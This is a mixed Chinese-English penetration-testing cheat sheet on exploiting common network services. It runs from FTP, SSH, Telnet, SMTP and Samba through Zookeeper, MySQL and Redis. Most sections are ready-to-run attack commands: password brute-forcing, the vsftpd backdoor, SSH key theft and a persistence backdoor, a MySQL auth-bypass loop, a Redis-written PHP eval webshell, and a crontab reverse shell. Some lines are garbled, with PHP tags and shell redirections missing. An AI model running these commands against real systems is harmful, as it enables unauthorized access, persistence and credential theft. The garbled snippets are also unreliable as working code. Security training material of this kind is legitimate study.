常见服务类漏洞

FTP 漏洞

FTP 协议介绍

FTP (File Transfer Protocol) is one of the protocols in the TCP/IP protocol group. The FTP protocol includes two components, one is an FTP server and the other is an FTP client. Among them, the FTP server is used to store files, and users can use the FTP client to access resources located on the FTP server through the FTP protocol. When developing a website, the FTP protocol is usually used to pass web pages or programs to a web server. In addition, because FTP transmission efficiency is very high, this protocol is generally used when transmitting large files on the network.

By default, the FTP protocol uses two ports 20 and 21 in the TCP port, 20 is used to transmit data and 21 is used to transmit control information. However, whether to use 20 as the port for transmitting data is related to the transmission mode used by FTP. If active mode is used, then the data transmission port is 20; if passive mode is used, the specific port of the end needs to be negotiated and decided by the server and client.

Banner 信息

Banner information exposes vulnerabilities in any software or service running on a remote system, so its software version needs to be hidden after installing any service.

匿名登录 anonymous login

msf

1

scanner/ftp/anonymous module

中间人嗅探

Attackers can use sniffing tools to help them sniff packets transmitted between servers and clients in the network and retrieve credentials, called sniffing, and then use them for unauthorized access. As mentioned above, FTP users can authenticate themselves using a plaintext login protocol for username and password.

FTP 暴力破解工具

hydra

1

hydra -v -L user.txt -P pass.txt ftp://ip

MSF

1

auxiliary/scanner/ftp/ftp_login

vsftpd 笑脸漏洞

Version: vsftp 2.3.4

back door:

If the username contains :) you can enable the backdoor shell bound to port 6200

防御

Modify the banner information on the configuration

Add ssl certificate (SSL_Enable=YES)

Whitelist restriction login

iptables Set the number of logins and login threads

SSH 漏洞

SSH 简介

SSH is the abbreviation of Secure Shell, formulated by the IETF's Network Working Group; SSH is a security protocol based on the application layer. SSH is a more reliable protocol designed for remote login sessions and other network services. Using the SSH protocol can effectively prevent information leakage during remote management. SSH was originally a program on UNIX systems, but later it quickly expanded to other operating platforms. SSH can compensate for vulnerabilities in the network when used correctly. SSH client is suitable for a variety of platforms. Almost all UNIX platforms—including HP-UX, Linux, AIX, Solaris, Digital UNIX, Irix, and others—can run SSH.

端口扫描

nmap

1

nmap -sV -p 22 IP

msf

1

auxiliary/scanner/ssh/ssh_version

密码破解

msf

1

2

use auxiliary/scanner/ssh/ssh_login

set stop_on_success true

SSH 用户代码执行

msf

1

use exploit/multi/ssh/sshexec

使用 RSA 密钥建立 SSH 连接

Configuration:

1

2

3

4

5

6

7

8

ssh-keygen

cd /home/kali/.ssh

ls

cat id_rsa.pub authorized_keys

scp msfadmin@ip:/home/msfadmin/.ssh/id_rsa ./

sudo vim /etc/ssh/sshd_config

PasswordAuthentication no

sudo /etc/init.d/ssh restart

connect:

1

ssh -i id_rsa username@ip

窃取 SSH 密钥

Obtained meterpreter session, stealing SSH keys

1

2

3

4

use auxiliary/scanner/ssh/ssh_login Get the session

use post/multi/gather/ssh_creds

set session 1

run

SSH 密钥持久性后门

Obtained meterpreter session, leaving SSH key persistence backdoor

1

2

3

4

use auxiliary/scanner/ssh/ssh_login Get the session

use post/linux/manager/sshkey_persistence

set session 1

run

防御

修改默认端口

1

2

3

sudo vim /etc/ssh/sshd_config

port 22222

sudo /etc/init.d/ssh restart

Telnet 漏洞

telnet 简介

The Telnet protocol is a member of the TCP/IP protocol family and is the standard protocol and main method of Internet remote login services. It provides users with the ability to complete remote host work on the local computer. Use the telnet program on the terminal user's computer and use it to connect to the server. Terminal users can enter commands in the telnet program, which run on the server, just as they enter directly on the server's console. The server can be controlled locally. To start a telnet session, you must enter a username and password to log in to the server. Telnet is a commonly used method to remotely control a web server.

banner 信息

/etc/issue.net

msf

use auxiliary/scanner/telnet/telnet_version

修改默认端口

/etc/services

sudo /etc/init.d/xinetd restart

通过嗅探窃取凭据

plain text transmission, can be sniffed

暴力破解

hydra

1

hydra -v -L user.txt -P pass.txt telnet://IP

msf

1

2

3

4

5

6

use auxiliary/scanner/telnet/telnet_login

set rhost

set stop_on_success true

set user_file user.txt

set pass_file pass.txt

run

保护 telnet 免受暴力攻击

will allow traffic access to port 23 from IP address 192.168.1.1

1

sudo iptables -A INPUT -s 192.168.1.1 -p tcp --dport 23 -j ACCEPT

drop traffic from other IP addresses on port 23

1

sudo iptables -A INPUT -p tcp --dport 23 -j DROP

SMTP 漏洞

SMTP 简介

SMTP is a protocol that provides reliable and efficient email transmission. SMTP is a mail service built on the FTP file transfer service. It is mainly used to deliver mail information between systems and provide notifications about letters. SMTP is independent of a specific transmission subsystem and only requires reliable and ordered data flow channels. One of the important features of SMTP is its ability to transmit mail across the network, namely SMTP mail relay. Using SMTP, mail transmission between processing processes in the same network can be realized, or mail transmission between a processing process and other networks can be realized through a repeater or gateway.

SMTP 命令和返回码

MAIL FROM

Specify the sender address

RCPT TO

Specify a single email recipient: there may be multiple RCPT TOs; often after the MAIL FROM command

VRFY

Used to specify whether the user/emailbox exists; due to security reasons, the server often prohibits this command

EXPN

Verify that a given mailbox list exists and is often disabled

Return code

250: Requires the email operation to be completed

500: Requirement that the email operation is not completed and the email address is unavailable (for example, the email address is not found, or is not accessible)

Postfix 简介

postfix is the default mail transfer agent (MTA) for ubuntu

http://www.postfix.org

SMTP 用户枚举

Ubuntu system users are postfix users

telnet

Smtp-user-enum

msf

手动枚举 SMTP 用户

telnet

VERY ftp

MAIL FROM:ftp + RCPT TO:ftp

SMTP-user-enum

1

2

3

4

5

apt-get install smtp-user-enum

smtp-user-enum -M VRFY -u root -t 202.38.xxx.xxx

smtp-user-enum -M VRFY -U dic.txt -t 202.38.xxx.xxx

smtp-user-enum -M RCPT -u bin -t 202.38.xxx.xxx

smtp-user-enum -M EXPN -u bin -t 202.38.xxx.xxx

msf

1

auxiliary/scanner/smtp/smtp_enum

暴力破解

hydra

1

hydra -l msfadmin -P passwd.txt smtp://IP

Samba 漏洞

Samba 简介

Samba is a free software that implements the SMB protocol on Linux and UNIX systems, consisting of server and client programs.

SMB 简介

SMB (Server Messages Block) is a communication protocol for sharing files and printers on a local area network. It provides sharing services for different computers in the local area network to provide files, printers and other resources.

The SMB protocol is a client/server protocol through which clients can access shared file systems, printers and other resources on the server. By setting up NetBIOS over TCP/IP, Samba can not only share resources with local network hosts, but also with computers around the world.

SMB 信息泄露

msf

1

auxiliary/scanner/smb/smb_version

nmap

1

2

nmap -sV -p 445 IP

nmap -sV -v -p 445 --script=smb-vuln*

nmblookup

nmblookup is used to query NetBIOS names and map them to IP addresses in the network using TCP/IP-based NetBIOS queries. These options allow the directing of name queries to a specific IP broadcast area or to a specific machine. All queries are done through UDP.

nmblookup is a useful command for enumerating domain/workstation and MAC addresses

1

nmblookup -A 192.168.1.139

nbtscan

Scan the name server opened by NetBIOS on a local or remote TCP/IP network, because this is the first step to find the opening share

Can work throughout the subnet, not on a single IP

1

nbtscan 192.168.1.1/24

SMBMap

SMBMap allows users to enumerate samba shared drives across the entire domain. List shared drives, drive permissions, shared content, upload/download functions, automatic download pattern matching of file names, and even execution of remote commands. Designed to simplify the search for potentially sensitive data in large networks.

1

2

smbmap -H 192.168.1.139

smbmap -H 192.168.1.139 -u msfadmin -p msfadmin

暴力破解

hydra

1

hydra -L user.txt -P pass.txt -v smb://ip

命令执行

1

2

search smb 3.0.20

use exploit/multi/samba/usermap_script

Zookeeper

Zookeeper 简介

Zookeeper is a distributed service framework and a sub-project of Apache Hadoop. It is mainly used to solve some data management problems often encountered in distributed applications, such as: unified naming services, state synchronization services, cluster management, and management of distributed application configuration items.

环境搭建

1

2

3

4

wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14.tar.gz

tar -xzvf zookeeper-3.4.14.tar.gz

mv zoo_sample.cfg zoo.cfg

./zkServer.sh start

未授权访问

Zookeeper has no password set by default. Without any access control, an attacker can obtain a large amount of sensitive information from the system by executing the env command, including the system name and Java environment.

Zookeeper's default port is enabled on port 2181

1

2

netstat -an | grep 2181

nmap -sV -p 2181 IP

1

nc IP 2181

envi

Print detailed information about the service environment

stat

List statistics about performance and connection clients

ruok

Test whether the server is running in a non-error state

reqs

List unfinished requests

dump

List unfinished sessions and temporary nodes

Graphical interface tools:

ZooInspector

Mysql 漏洞

Mysql 简介

Mysql database is one of the most widely used databases in the world. Many famous companies and sites use Mysql as their database support.

Currently, many architectures use Mysql as the database management system, such as LAMP, WAMP, etc.

Mysql 信息收集

版本信息

1

2

3

4

nmap:

nmap -sV -p 3306 IP

msf:

use auxiliary/scanner/mysql/mysql_version

其它相关信息

1

use auxiliary/admin/mysql/mysql_enum

Mysql 密码破解

hydra

1

hydra -L user.txt -P password.txt -v mysql://IP

msf

1

use auxiliary/scanner/mysql/mysql_login

Mysql 漏洞利用

MySQL 身份认证漏洞(CVE-2012-2122)

https://secists.org/oss-sec/2012/q2/493

The return value of memcmp() is within [127, -128]. Compare the two strings by character. If you find a different one, subtract the two characters and return

When memcmp() returns 0, check_scramble() passes the authentication

漏洞利用

msf:

1

use auxiliary/scanner/mysql/mysql_authbypass_hashdump

Linux shell:

1

for i in `seq 1 1000`;do mysql -uroot -pwrong -h IP -P3306;done

Redis

redis 简介

Redis is one of the non-relational databases that people often call. It is an open source log-type and Key-Value database written in the ANSI language, supports network-based and persistent log-type and Key-Value databases, and provides APIs in multiple languages.

Redis is like memcached. To ensure efficiency, data is cached in memory. However, Redis will periodically write updated data to disk or write modification operations to appended record files, and on this basis, it realizes master-slave (master-slave) synchronization.

redis 未授权访问漏洞

The default configuration is to use port 6379 and does not have a password. This will result in unauthorized access to read and write Redis data.

在 web 目录下写入 Webshell

1

2

3

4

config set dir /var/www/html

config set dbfilename webshell.php

set webshell '?php phpinfo();'

save

Tips for redis to write shell when the database is too large:

1

2

3

4

5

6

?php

set_time_limit(0);

$fp=fopen('webshell.php','w');

fwrite($fp,'?php @eval($_POST[1]);');

exit();

?

写 ssh 公钥

1

2

3

4

5

6

7

ssh-keygen -t rsa

cd .ssh

(echo -e '\n\n'; cat id_rsa.pub; echo -e '\n\n') 1.txt

cat 1.txt | redis-cli -h ip -x set payload

config set dir /root/.ssh

config set dbfilename authorized_keys

save

写 crontab

1

2

3

4

5

redis-cli -h 192.168.0.104

set xxx '\n\n*/1 * * * * /bin/bash -i/dev/tcp/192.168.0.104/4444 01\n\n'

config set dir /var/spool/cron

config set dbfilename root

save

利用 redis 主从复制 rce

https://geekby.xyz/2019/07/15/redis-ji-yu-zhu-cong-fu-zhi-de-rce-li-yong-fang-shi/

Zabbix 漏洞

Zabbix 简介

Zabbix is a network monitoring and management system developed by Alexei Vladishev, based on the ServerClient architecture. Can be used to monitor the status of various network services, servers, network machines, etc.

Use various Database-ends such as MySQL, PostgreSQL, SQLite, Oracle IBM DB2 to store data. The server side is based on C language, and the web management side frontend is based on PHP. Zabbix can be monitored in a variety of ways. You can just use Simple Check without installing the client, or you can monitor it based on various SMTP or HTTP protocols.

After installing Zabbix Agent in clients such as UNIX, Windows, you can monitor CPU Load, network usage status, hard disk capacity and other states. Even if the Agent is not installed in the monitoring object, Zabbix can monitor the target via SNMP, TCP, IMP, PMI, SSH, and telnet.

In addition, Zabbix includes various Item alert functions such as XMPP

Zabbix SQL 注入漏洞

https://geekby.xyz/2019/03/01/zabbix-latest.php-sql-zhu-ru-lou-dong/

Zabbix 命令执行利用

During the installation and configuration of Zabbix, the administrator used a weak password or a default username and password. For example: Admin/zabbix, in this way, the user authentication of the Zabbix server is useless. Attackers can create system.run[command,] monitoring items to execute commands, and even obtain server shells to perform various mining activities.

https://www.jianshu.com/p/675b6385b7c0

Elasticsearch 漏洞

Elasticsearch 简介

Elasticsearch is a distributed, high-scaling, high-real-time search and data analysis engine. It can easily enable a large amount of data to be searched, analyzed and explored. Taking full advantage of Elasticsearch's horizontal scalability can make data more valuable in production environments.

The implementation principle of Elasticsearch is mainly divided into the following steps. First, the user submits the data to the Elasticsearch database, and then uses the word segmentation controller to store the corresponding statement and word segmentation into the data. When the user searches for data, he or she ranks the results according to the weight, and then scores them according to the weight.